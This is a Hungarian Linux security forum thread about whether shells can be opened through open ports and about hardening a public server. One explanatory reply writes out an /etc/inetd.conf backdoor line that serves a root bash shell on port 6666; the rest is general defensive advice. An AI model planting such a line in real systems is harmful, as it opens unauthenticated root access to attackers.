linux biztonsag
Elküldve: 2003. 12. 16. 12:23
Elküldve: 2003. 12. 16. 16:04
idézet:
Ezt írta sandman_hu:
Olvastam egy howto-t, amiben azt irtak a halozati dolgokkal kapcsolatban, hogy ha egy adott gepen van egy nyitott port es azon semminemu alkalmazas nem fut, akkor egy parancssal kivulrol shell-t lehet nyitni - meg akkor is, ha nincs belepesi engedelyunk a gepre. Ebbol mi igaz? Melyik parancs hajtja ezt vegre? Vedekezni gondolom ugy kell ellene, hogy a felesleges portokat le kell tiltani.[/quote]
hat igen, ez a legjobb vedekez, + letezik vmi progi, aminek most enm ju eszembe a neve ami azt csinalja, hogy ha letja, hogy scannelik vegig a portokat, hogy melyik van nyitva/zarva akkor bezarja az osszeset...
(A UNIX Programozói kézikönyv második kiadásából, 1972. június.)
Elküldve: 2003. 12. 16. 19:09
idézet:
Ezt írta giotto, aki meg mindig melot keres:
hat igen, ez a legjobb vedekez, + letezik vmi progi, aminek most enm ju eszembe a neve ami azt csinalja, hogy ha letja, hogy scannelik vegig a portokat, hogy melyik van nyitva/zarva akkor bezarja az osszeset...[/quote]
portsentry?![]()
Elküldve: 2003. 12. 17. 06:24
Elküldve: 2003. 12. 17. 15:28
idézet:
Ezt írta sandman_hu:
De nyitott porton keresztul, ahol nem fut alkalmazas, lehet nyitni shell-t?[/quote]
Javítsatok ki, ha tévednék, de szerintem egy port attól nyitott, hogy fut egy alkalmazás, ami magához kötötte, lásd szerver.
Szal, ha egy adott portot nem használ semmilyen alkalmazás sem, akkor arra nem lehet bejelentkezni, se semmit...
De persze egy jó tűzfal az igazi biztonság...![]()
Idézet
Elküldve: 2003. 12. 17. 18:27
Elküldve: 2003. 12. 17. 20:27
Egyebkent szerintem nem lehet igy shellt inditani, en ezt eleg marhasagnak tartom, kivancsi lennek, merre olvastal rola!

Elküldve: 2003. 12. 17. 23:14
idézet:
Ezt írta marczi:
Egyebkent szerintem nem lehet igy shellt inditani, en ezt eleg marhasagnak tartom, kivancsi lennek, merre olvastal rola![/quote]
Szerintem [url="http://"http://www.microsoft.com/hun/default.mspx"]itt[/url]... na jó, ez elég szar vicc volt...![]()
![]()
Idézet
Elküldve: 2003. 12. 18. 06:30

Elküldve: 2003. 12. 18. 09:00
idézet:
Ezt írta sandman_hu:
Jol van na, csak erdeklodom. En sem tudom biztosan! De latom azert Ti sem...[/quote]
Jó. Akkor én felvállalom biztosra. Az, hogy egy portra érkező csomagokat nem hajítja el a gép (DROP) vagy nem küld vissza TCP RESET-et (REJECT, DENY) az még nem jelenti azt, hogy tudsz shellt indítani. Ahhoz hogy shellt tudj indítani azon a porton át, ahhoz kell egy program, ami az adott porton figyel, fogadja a byte-jaidat, elindít neked pl. egy shellt és visszaküldi neked, amit a shell kiírt.
Elküldve: 2003. 12. 18. 11:33

Elküldve: 2004. 01. 26. 10:29
idézet:
Ezt írta giotto, aki meg mindig melot keres:
hat igen, ez a legjobb vedekez, + letezik vmi progi, aminek most enm ju eszembe a neve ami azt csinalja, hogy ha letja, hogy scannelik vegig a portokat, hogy melyik van nyitva/zarva akkor bezarja az osszeset...[/quote]
Bocs, de nem vagy te egy kissé diszleksziás?![]()
éppelméjű smilie meg nem fürdik formaldehidben,
mert belefullad.
mindez azt hiszem igen tanulságos
Elküldve: 2004. 01. 26. 10:38
idézet:
Ezt írta marczi:
Csatlakozom, en is vallalom, hogy shell-t inditani csak ugy nem lehet akarmilyen portrol![/quote]
Előre bocsájtom, nem igazán értek a pingvines rendszerek lelkivilágához, csak minimalista szinten:
de tsókolom; ha fut egy rendszer, akkor azon már ott fut a shell, nem kell elindítani, csak be kell jelentkezni rá, nem? Ha mindez emészthetetlenül fájdalmas valaki számára, kérem világosítson fel, hogy értsek hozzá én is egy picinyt legalább. Köszöntemszép'. :confused:![]()
mert belefullad.
Elküldve: 2004. 01. 26. 16:49
idézet:
Ezt írta rőt pajesz:
Előre bocsájtom, nem igazán értek a pingvines rendszerek lelkivilágához, csak minimalista szinten:
de tsókolom; ha fut egy rendszer, akkor azon már ott fut a shell, nem kell elindítani, csak be kell jelentkezni rá, nem? Ha mindez emészthetetlenül fájdalmas valaki számára, kérem világosítson fel, hogy értsek hozzá én is egy picinyt legalább. Köszöntemszép'. :confused:[/quote]
Na, vilagositsunk...
Mindenfele UNIX rendszeren a kernel elindulasa utan elindul az un. init processz (processz id = 1, mivel ez az elso processz). Az init az un. initrc file-ban leirtak alapjan elkezdi elinditani az egyes szolgaltatasokat. Az egyik ilyen szolgaltatast ugy hivjak, hogy inetd, aminek egyetlen funkcioja van: figyel bizonyos TCP portokon, es az ezekre a portokra torteno kapcsolodas eseten a konfiguracios allomanyaban (/etc/inetd.conf) leirt parancsot futtatja le.
Ennek a mechanizmusnak a segitsegevel lehetseges a legegyszerubben demonokat (vagyis kiszolgalo feladatkoru, egy bizonyos halozati porton figyelo kliens-szerver szolgaltatasokat) implementalni, ugyanis az inetd altal elinditott programok sima I/O muveletekkel kezelik az adott halozati portot (vagyis amit a user tavolrol kuld a gepnek, az az adott futtatott program standard inputjara erkezik, a program outputjat pedig atkuldi a halozaton a masik oldalra).
Megjegyzes: mem inetd-t hasznalo halozati demonokat implementalni egy kicsit bonyolultabb (olyan lepeseket kell csinalni, mint: 2x forkolni, standard input/output-ot lezarni, tilos a kiiras, komplexen kell kezelni a halozati forgalmat (listen, accept, stb)).
Namost, egy UNIX rendszer gyonyoruen el tud futni mindenfele shell futtatasa nelkul, hiszen a shell nem mas, mint a felhasznalo parancsait ertelmezo program. Ha nincs belepve felhasznalo, akkor nem fut shell (eltekintve mondjuk egy eppen batch-ben futo shell scripttol, de annak semmi koze a halozathoz).
Hogyan lehet akkor egy tavoli geprol egy portra csatlakozva shellt kapni? Hat igen egyszeruen: be kell juttatni egy "trojai lovat" a gepre, ami figyel egy bizonyos porton, es az ejszaka leple alatt beengedi a varosba a gorog hoditokat. Ilyen trojai programok igazabol Windows alatt elnek dogivel, de azert a Linux es UNIX platformot sem kimelik a kedves rosszindulato terrorista programozo urak. Az egyik legegyszerubb ilyen trojai pl a kovetkezo sor az /etc/inetd.conf-ba:
6666 stream tcp nowait root /bin/bash
Ekkor a 6666 portra torteno csatlakozas eredmenyekent egy, a root felhasznalo neveben futo shell-t kapunk az adott gepen. Persze ehhez mar korabban be kellett torni az adott gepre, ahol letre kellett hozni ezt a sort megfelelo file-ban, amihez mar root jogosulsag kellett, igy mindennek csak akkor van ertelme, ha visszajaro lelkek vagyunk az adott gepen...
Amugy a gyakorlatban ennel joval rejtettebb backdoor-okat szoktak a gepeken hagyni a kedves terrorista urak.
A lenyeg az, hogy ettol sem kell jobban felni, mint attol, hogy egy vasarnap hajnalban valaki betor a lakasunkba...
Jelszo: patchelni, frissiteni, update-elni gyakran, gyakran, gyakran, hogy az elso betores eselyet csokkenteni tudjuk...
A tuzfalasdi pedig azert nem nyujt igazabol vedelmet ez ellen, mert ha mar bent van a tamado, es tud nyitni backdoort, akkor a tuzfalbeallitasunkat is at tudja irni. Tehat ekkor mar az eredeti tuzfalbeallitasokkal is gond volt.
Bocs, ha kihagytam valamit...
Elküldve: 2004. 01. 27. 15:44
idézet:
Ezt írta j.cs.:
Na, vilagositsunk...
Bocs, ha kihagytam valamit...[/quote]
Én kérek elnézést tudatlanságomért és köszönöm szépen a hasznos információkat és a megértő hangnemet. KCS
dU bIST üBERcOOL
[ 2004. január 27.: rőt pajesz szerkesztette a hozzászólást ]
mert belefullad.
Elküldve: 2007. 11. 23. 22:00
hogyan lehet egy linux kiszolgalot biztonsagosra megcsinalni? kernel patchekkel? agyonkonfiguralt kernellel? stb?
Elküldve: 2007. 11. 23. 23:46
Idézet: charlie - Dátum: 2007. nov. 23., péntek - 22:00
hogyan lehet egy linux kiszolgalot biztonsagosra megcsinalni? kernel patchekkel? agyonkonfiguralt kernellel? stb?
Szerintem alapvetően két csapásirány létezik:
1. saját magad fordított kernel és kernel patchek (pl. debian, gentoo, stb.)
2. "gyári" kernelek és sűrű frissítések (redhat, suse, centos (ez gyakorlatilag ingyenes redhat))
Ugye mindkettőnek megvan az előnye és a hátránya is.
A saját magad fordított kernelnél a gépedre lesz optimailizálva a kernel, kernel patchek felrakva, gyors, csak a szükséges kódot tartalmazza a kernel és a csak a szükséges modulok vannak meg. Hátránya, hogy lehet vele szívni szépen, ha nem vagy benne rutinos.
A "gyári" kernelek ezzel szemben tartalmaznak mindenféle modult, opciókat, ezért lehet, hogy lassabbak a sajátnál. Cserébe viszont letesztelt és könnyen reprodukálható rendszert lehet belőle építeni és kevesebb a szívás vele. Az újabba kernelre való áttérés is zökkenőmentesebb.
"Biztonságossá tenni". Ez alatt mit értessz? Nem mindegy, hogy csak "kívülről" várhatók támadások (hálózaton keresztül), vagy "bentről" is. Az utóbbi abban az esetben fordulhat elő, ha több login van a gépen, más userek is használják.
A szerver biztonsága nagyban függ a rajta futó szolgáltatásoktól is, bár azok biztonsági réseit részben ki lehet védeni erős security beállításokkal.
És végül, de nem utolsósorban a fizikai védelem is fontos. Sokra mész a hiperszuper tűzfallal, szabályokkal, ha megfogják a gépet, bevágják a kocsiba és úgy lopják el az adatokat.
Szerkesztette: Sipi- 2007. 11. 23. 23:52 -kor
Elküldve: 2007. 11. 24. 00:19
Idézet: charlie - Dátum: 2007. nov. 23., péntek - 22:00
A leggyakrabban elofordulo kompromitalasok tavolrol tortennek, ezert
1. a legfontosabb hogy csak azok a szolgaltatasok mukodjenek, amik valoban kellenek, es ezeket is rendszeresek kell figyelni/frissitgetni.
2. Megfeleloen kialakitott tuzfal szabalyzat (ki, honnan mit mikor, hogyan erhet el)
3. Mas altal irt tavolrol elerheto programok (pl. php) mar valamilyen RBAC dologgal jol lekorlatozni
4. Log audit rendszeresen
5. Monitorozas
6. valamilyen rootkit hunter, esetleg virus killer.
Ez a legfontosabb szerintem, a masodik mar a helyi login jogosultsagos normalis felmeres utani atgondolt kialakitasa/beallitasa, meg a CVS problemak/frissitesek figyelese
Where you thought you were going to... were never there.
Where you are ain't no good, unless you get away from there!
Elküldve: 2007. 11. 24. 09:38
ha mondjuk van egy tuzfall (mittomén, valami normalisabb, cisco, stb.)) már maga a gép előtt (plusz ugye az iptables magan a gepen), az mennyit segit? vagy nem sok értelmuk van?
vegyunk mondjuk egy példát, mondjuk webszervert (meg hozza php-mysql koritest, mondjuk azt, hogy leveleo az egy másik gépen van, igy az nincs)
log auditon konkretabban mit ertesz (rendszeresen nezni?)?
érdemes a rendszer logot egy másik gépre kuldeni? (meg ugy a tobbi logot is)?
valamint melyik disztrot érdemes publikus szerver feladatokra, vagy melyik disztro milyen kernelet? gondolom én, hogy a sima desktop célra szánt kiadásokban inkabb a hasznalhatosagra mennek ra, mint a biztonsagra. van olyan disztribucio, ami csak szerver célra megy rá?
érdemes az apacsot (meg a mysql, php, ftp) sajat magamnak forditani, vagy amit tárolokbol fel lehet tenni (pl. debian) az megfelelo?